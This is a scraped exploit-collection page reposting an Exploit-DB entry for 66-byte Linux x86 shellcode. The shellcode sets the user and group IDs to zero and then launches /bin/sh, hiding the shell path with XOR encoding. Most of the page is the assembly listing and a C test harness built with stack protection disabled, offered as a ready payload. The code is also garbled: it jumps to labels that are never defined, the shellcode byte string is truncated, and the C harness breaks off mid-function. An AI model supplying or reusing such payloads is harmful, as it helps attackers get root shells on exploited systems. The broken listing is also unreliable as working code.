Channel: Exploit Collector
Viewing all articles
Browse latest Browse all 13315

Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)

EDB-ID: 42177
Author: nullparasite
Published: 2017-06-15
Type: Shellcode
Platform: Lin_x86
Shellcode: Download Shellcode Code Download / View Raw
Shellcode Size: 66 bytes

 ;Author: nullparasite 
;Contact: nullparasite@protonmail.ch
;Category: Shellcode
;Architecture: Linux x86
;Description: This shellcode, first set uid and gid to zero then call shell using execve. Also, /bin/sh defined as a XOR encrypted.
;Tested on: Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux


global _start

section .text

jmp entrypoint ; jump immd.

pop esi ; address of string -> esi
xor eax, eax ; clear eax
xor ecx, ecx ; ecx
mov BYTE [esi+7], al ; terminate string, str[7] = NULL
lea ebx, [esi] ; put address of string -> ebx
mov DWORD [esi + 8], ebx ; replace first 4-# with string
mov DWORD [esi + 12], eax ; replace last 4-# with NULL

mov BYTE cl, 7 ; set counter to 7

xor BYTE [esi + ecx - 1], 0x3 ; s[cl-1] = s[cl-1] ^ 3
sub cl, 1 ; dec count by 1
jnz decode ; jump if not zero

xor ebx, ebx ; clear ebx, setuid(0)
mov al, 0x17 ; setuid = 0x17
int 0x80 ; trap

xor ebx, ebx ; clear ebx, setgid(0)
mov al, 0x2e ; setgid = 0x2e
int 0x80 ; trap

mov BYTE al, 0x0b ; execve = 0x0b
mov ebx, esi ; arg1, /bin/sh
lea ecx, [esi + 8] ; arg2, p[0] = /bin/sh, p[1] = NULL
lea edx, [esi + 12] ; arg3, pointer to NULL

int 0x80 ; trap

call prepare ; call prepare
db ',ajm,pk#########' ; store string on the stack


# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing


unsigned char code[] = "\xeb\x34\x5e\x31\xc0\x31\xc9\x88\x46\x07\x8d"

typedef int(*shellcode_t)();

int main(){
shellcode_t ret = (shellcode_t)code;


Viewing all articles
Browse latest Browse all 13315

Trending Articles